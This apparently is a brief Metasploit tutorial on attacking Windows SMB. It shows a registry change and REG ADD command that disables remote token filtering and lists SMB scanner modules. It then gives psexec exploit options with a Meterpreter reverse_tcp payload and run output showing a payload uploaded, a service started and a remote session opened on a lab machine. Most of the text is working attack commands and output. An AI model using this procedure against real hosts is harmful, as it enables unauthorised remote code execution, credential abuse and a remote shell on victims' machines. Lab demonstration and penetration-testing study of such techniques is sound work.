metasploit - smb

If you want to exploit smb locally, you need to modify regedit settings and reboot your computer.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"LocalAccountTokenFilterPolicy"=dword:00000001
           

Run cmd / Powershell with administrator privilege, and execute the command:

REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
           

We can use the follow modules to exploit windows smb.

msf > use auxiliary/scanner/smb/
use auxiliary/scanner/smb/pipe_auditor
use auxiliary/scanner/smb/pipe_dcerpc_auditor
use auxiliary/scanner/smb/psexec_loggedin_users
use auxiliary/scanner/smb/smb2
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumusers_domain
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/smb_lookupsid
use auxiliary/scanner/smb/smb_uninit_cred
use auxiliary/scanner/smb/smb_version
           

Meterpreter will be used for demo.

msf exploit(psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT                               yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             WORKGROUP        no        The Windows domain to use for authentication
   SMBPass               password         no        The password for the specified username
   SMBUser               nfs              no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST         yes       The listen address
   LPORT                  yes       The listen port


Exploit target:

   Id  Name
   --  ----
      Automatic


msf exploit(psexec) > run

[*] Started reverse handler on : 
[*] Connecting to the server...
[*] Authenticating to :|WORKGROUP as user 'nfs'...
[*] Uploading payload...
[*] Created \DMiyfhpP.exe...
[+] : - Service started successfully...
[*] Deleting \DMiyfhpP.exe...
[*] Sending stage ( bytes) to 
[*] Meterpreter session  opened (: -> :) at -- :: +

meterpreter > sysinfo 
Computer        : SECLAB
OS              : Windows  (Build , Service Pack ).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 
Meterpreter     : x86/win32
           

References

https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex::Proto::SMB-Error-mean%3F